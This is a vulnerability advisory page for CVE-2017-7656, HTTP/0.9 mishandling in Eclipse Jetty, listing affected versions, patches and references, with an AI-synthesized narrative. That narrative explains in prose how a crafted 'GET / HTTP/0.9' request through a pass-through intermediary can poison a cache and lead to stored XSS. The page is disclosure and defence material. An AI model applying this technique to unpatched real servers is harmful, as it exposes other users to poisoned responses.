CVE-2017-7656
Description
In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), HTTP/0.9 is handled poorly. An HTTP/1 style request line (i.e. method space URI space version) that declares a version of HTTP/0.9 was accepted and treated as a 0.9 request. If deployed behind an intermediary that also accepted and passed through the 0.9 version (but did not act on it), then the response sent could be interpreted by the intermediary as HTTP/1 headers. This could be used to poison the cache if the server allowed the origin client to generate arbitrary content in the response.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Jetty mishandles HTTP/0.9 request lines, enabling request smuggling and cache poisoning when deployed behind an intermediary.
Vulnerability
In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x in non-default configuration with RFC2616 compliance enabled, HTTP/0.9 is handled poorly. An HTTP/1 style request line (i.e., method space URI space version) that declares a version of HTTP/0.9 is accepted and treated as a 0.9 request [1][3]. This means the server responds without HTTP status line or headers, sending only the entity body. Affected versions include Jetty <= 9.3.23.v20180228 and >= 9.4.0 through <= 9.4.10.v20180503 [3].
Exploitation
An attacker must be able to send requests through an intermediary (such as a reverse proxy or cache) that also accepts and passes through HTTP/0.9 version but does not act on it (i.e., it forwards the request as-is) [1]. The attacker sends a crafted request with a line such as GET / HTTP/0.9 to the origin Jetty server. Since Jetty treats this as an HTTP/0.9 request, it responds with raw content (no HTTP headers). The intermediary, expecting an HTTP/1 response, may misinterpret this raw content from Jetty as HTTP/1 headers, thereby allowing the attacker to inject arbitrary headers into the response seen by the next client [1][2]. No authentication is required; the attack is performed over the network.
Impact
If the server allows the origin client to generate arbitrary content in the response (i.e., the attacker can control parts of the response body), the attacker can poison the cache of the intermediary [1]. This can lead to stored cross-site scripting (XSS) or other attacks against users who subsequently receive the cached malicious response. The confidentiality, integrity, and availability of the system may be compromised, depending on the cache's role.
Mitigation
For versions 9.3.x, upgrade to 9.3.24.v20180605 or later; for 9.4.x, upgrade to 9.4.11.v20180605 or later [3]. The Jetty bug tracker confirms the fix was applied [2]. Administrators should also ensure that intermediaries (reverse proxies, caches) block or sanitize HTTP/0.9 requests, or disable RFC2616 compliance in Jetty configurations to avoid the vulnerable code path.
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.eclipse.jetty:jetty-serverMaven | < 9.3.24.v20180605 | 9.3.24.v20180605 |
org.eclipse.jetty:jetty-serverMaven | >= 9.4.0, < 9.4.11.v20180605 | 9.4.11.v20180605 |
Affected products
2- The Eclipse Foundation/Eclipse Jettyv5Range: unspecified
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
19- github.com/advisories/GHSA-84q7-p226-4x5wghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2017-7656ghsaADVISORY
- www.debian.org/security/2018/dsa-4278ghsavendor-advisoryx_refsource_DEBIANWEB
- www.securitytracker.com/id/1041194ghsavdb-entryx_refsource_SECTRACKWEB
- bugs.eclipse.org/bugs/show_bug.cgighsax_refsource_CONFIRMWEB
- lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272%40%3Cissues.activemq.apache.org%3Emitremailing-listx_refsource_MLIST
- lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3EghsaWEB
- lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3Emitremailing-listx_refsource_MLIST
- lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3EghsaWEB
- lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3Emitremailing-listx_refsource_MLIST
- lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3EghsaWEB
- lists.apache.org/thread.html/rbf4565a0b63f9c8b07fab29352a97bbffe76ecafed8b8555c15b83c6%40%3Cissues.maven.apache.org%3Emitremailing-listx_refsource_MLIST
- lists.apache.org/thread.html/rbf4565a0b63f9c8b07fab29352a97bbffe76ecafed8b8555c15b83c6@%3Cissues.maven.apache.org%3EghsaWEB
- security.netapp.com/advisory/ntap-20181014-0001ghsaWEB
- security.netapp.com/advisory/ntap-20181014-0001/mitrex_refsource_CONFIRM
- support.hpe.com/hpsc/doc/public/displayghsax_refsource_CONFIRMWEB
- www.oracle.com//security-alerts/cpujul2021.htmlmitrex_refsource_MISC
- www.oracle.com/security-alerts/cpuoct2020.htmlghsax_refsource_MISCWEB
- www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.htmlghsax_refsource_MISCWEB
News mentions
0No linked articles in our index yet.